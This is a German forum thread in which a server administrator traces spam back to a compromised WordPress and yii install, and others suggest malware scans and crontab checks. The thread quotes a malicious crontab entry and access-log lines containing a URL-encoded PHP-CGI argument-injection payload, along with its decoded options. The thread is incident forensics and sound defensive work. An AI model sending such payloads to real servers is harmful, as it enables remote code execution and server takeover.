Jump to content
Froxlor Forum
  • 0

Ich spamme, also bin ich (Spammer). Woher kommt mein Spam?


ometiclan

Question

Hallo Welt!

 

Ich habe prim?r ein Linux-Problem, vermutlich nicht Froxlor-bezogen. Sofern jemand einen Hinweis hat, w?re ich trotzdem Amazonwishlist-Dankbar... 

 

 

Folgende Sitaution: User mit Wordpress-Installation, ?bernommen von anderem Server (1: copy inkl. DB). Sp?ter stellt sich heraus, Template vom Wordpress l?dt ein "alternatives" jQuery nach, welches Besucher auf russische Seiten weiterleitet. Gel?scht, gelacht, gut so. Das war es aber noch nicht, drei Tage sp?ter kommen die ersten Abuse-Meldungen. Offenbar hatte der USer die glorreiche Idee seine Cache und Upload Directories auf 777 zu chmoden und das Wordpress-Template war auch noch nicht so richtig sauber. Nach einigen base64 dekodierungen alle m?glichen Spamscripts gefunden, postqueue gel?scht etc.

 

Konsequenz: rm -R Userfolder. 

 

Jetzt aber wirds dann interessant, denn der Spam hat nicht aufgeh?rt. Spamcop + GMX berichten von Spam, der von diesem Server gekommen sein soll.

[ SpamCop V4.8.2.018 ]
This message is brief for your comfort.  Please use links below for details.

Email from 85.25.195.7 / Tue, 14 Apr 2015 17:11:52 -0400
https://www.spamcop.net/w3m?i=z6294233036z971cfd0db37b574fbfcd5b4835d39ac8z

[ Offending message ]
Return-Path: <dow@quingroup.com>
Received: from mx-austrian.atl.sa.earthlink.net ([207.69.195.31])
   by mdl-increase.atl.sa.earthlink.net (EarthLink SMTP Server) with SMTP id 1yI87D7rm3Nl36Z0; Tue, 14 Apr 2015 17:11:53 -0400 (EDT)
Received: from spock.bigbytes.at ([85.25.195.7])
   by mx-austrian.atl.sa.earthlink.net (EarthLink SMTP Server) with SMTP id 1yI87C6Av3Nl34j0
   for <x>; Tue, 14 Apr 2015 17:11:52 -0400 (EDT)
Subject: Kwestcott For precepts over dignified ;-)
Content-Type: text/html; charset=UTF-8
Confident-Conquer-Tartness: cf5d273d
Handles-Identification-Nondeterminacy: 4cd294e9acb
Cranny-Backstop-Breast: slowly
Content-Transfer-Encoding: 7bit
From: Julie <dow@quingroup.com>
MIME-Version: 1.0
To: x
Date: Tue, 14 Apr 2015 23:11:53 +0000
Utilizing-Asiatics: 8a542a7f53
Message-ID: <5af3_____________________________a31c@quingroup.com>
X-ELNK-Received-Info: spv=1;
X-ELNK-AV: 0

<html>  
(Blabla hab ich rausgeschnitten)
</html> 

- Der Server ist kein Open Relay.

- Die Mail Logs sind clean, es l?uft also nicht ?ber den Mailserver.

- Per PHP scheint das auch nicht zu laufen, phpmail.log (mail.add_x_header / mail.log) ist clean.

- root scheint sicher, keine Auff?ligkeiten in den Logs, ChkrootKit, rkhunter etc. zeigen auch nix

 

 

Also was bleibt? Ich schau mit die laufenden Prozesse an und sehe:

USER   PID   %CPU   %MEM   VSZ   RSS   TTY   STAT   START   TIME   COMMAND
www-data   1186   7.2   0.0   35776   8700   ?   Rs   Apr06   1044:28   httpd
www-data   21653   6.8   0.0   36048   7188   ?   Ss   Mar27   1980:16   httpd
www-data   8241   1.7   0.0   333700   24112   ?   S   17:28   0:00   /usr/sbin/apache2
www-data   8233   1.6   0.0   334668   31184   ?   S   17:28   0:00   /usr/sbin/apache2

Die beiden www-data an erster und zweiter stelle sind mir dann doch ein wenig verd?chtig vorgekommen. Vor allem bei der CPU-Auslastung...

Prozesse gekillt, einmal gro?es FuckIt und reboot. Derzeit scheint wieder Ruhe eingekehrt zu sein.

 

Beim durchsehen der /customers f?llt mir auf, dass einige Ordner www-data als Besitzer und Gruppe haben. Eindeutig mein Fehler, hab ich nicht darauf geachtet und inzwischen jedem das zugeordnet, was ihm geh?rt.   

 

 

Meine Frage: WTF ist hier passiert? Und WTF hab ich hier falsch gemacht? Ich bin kein blutiger Anf?nger, aber das ?berfordert mich jetzt dann schon gewaltig, weil ich derzeit nicht mal verstehe, was passiert, geschweige denn wie ich es in Zukunft verhindern kann...

 

 

Link to comment
Share on other sites

5 answers to this question

Recommended Posts

Was passiert ist hast du doch ganz gut beschrieben. Da hat einer ne L?cke gefunden und diese ausgenutzt...das passiert, da hast du vermutlich selbst nichts bewusst falsch gemacht. Berechtigungen korrigieren haste schon gemacht und den Server auch gescanned. Ggfls macht es hier noch Sinn, nich nur nach Rootkits zu scannen, sondern mit ClamAV und/oder maldet das ganze System durchsuchen zu lassen.

Link to comment
Share on other sites

Ach ja die guten alten gehackten Webs. Das Problem wird nie aussterben. Wirklich Abhilfe gibts da nicht. Regelm??ig Patches bei den Webs einspielen und darauf achten keine Plugins oder Templates von Hobby Entwicklern welche nur einmal im Jahr geupdated werden zu installieren.

 

 

 

Prozesse gekillt, einmal gro?es FuckIt und reboot. Derzeit scheint wieder Ruhe eingekehrt zu sein.

 

Hast du auch mal die Crontab gepr?ft? Meist wird hier das Script nochmal mit rein geschmissen.

 

?brigens. Wenn du dir mal nicht sicher bist, wo der Spam herkommt, dieser aber bei dir in der Mail-Queue liegt, kannst du dir die Mail-Header ansehen. Seit PHP 5.3 findest du einen X-PHP-Originating-Script-Header der dir UserID und Script Name verr?t. :)

Link to comment
Share on other sites

Was passiert ist hast du doch ganz gut beschrieben. Da hat einer ne L?cke gefunden und diese ausgenutzt...das passiert, da hast du vermutlich selbst nichts bewusst falsch gemacht. Berechtigungen korrigieren haste schon gemacht und den Server auch gescanned. Ggfls macht es hier noch Sinn, nich nur nach Rootkits zu scannen, sondern mit ClamAV und/oder maldet das ganze System durchsuchen zu lassen.

 

 

Geclam't hab ich schon. Hat aber au?er den obligatorischen Viren und W?rmern in div. Spam-Mails nichts gefunden. :)

 

 

 

Hast du auch mal die Crontab gepr?ft? Meist wird hier das Script nochmal mit rein geschmissen.

 

?brigens. Wenn du dir mal nicht sicher bist, wo der Spam herkommt, dieser aber bei dir in der Mail-Queue liegt, kannst du dir die Mail-Header ansehen. Seit PHP 5.3 findest du einen X-PHP-Originating-Script-Header der dir UserID und Script Name verr?t. :)

Yep, den Crontab (*/15 * * * * /var/tmp/zJGceOeuK >/dev/null 2>&1) hab ich erwischt.

 

Die Mails lagen eben nicht in meinem Queue, sonst w?rs einfacher gewesen. (wie oben geschrieben: "Per PHP scheint das auch nicht zu laufen, phpmail.log (mail.add_x_header / mail.log) ist clean.") :)

 

 

Aber fyi, sofern es jemanden interessiert, nach n?herem betrachten meiner vhosts-Logs und dem Lesen einiger Berichte von Leuten mit dem selben Problem wie ich, stach mir folgendes ins Auge:


80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

 

 

...was dann durch http://meyerweb.com/eric/tools/dencoder/sich so ?bersetzte:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

... da das in einer yii-Basisinstallation war, die www-data geh?rte... B?M.

 

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.



×
×
  • Create New...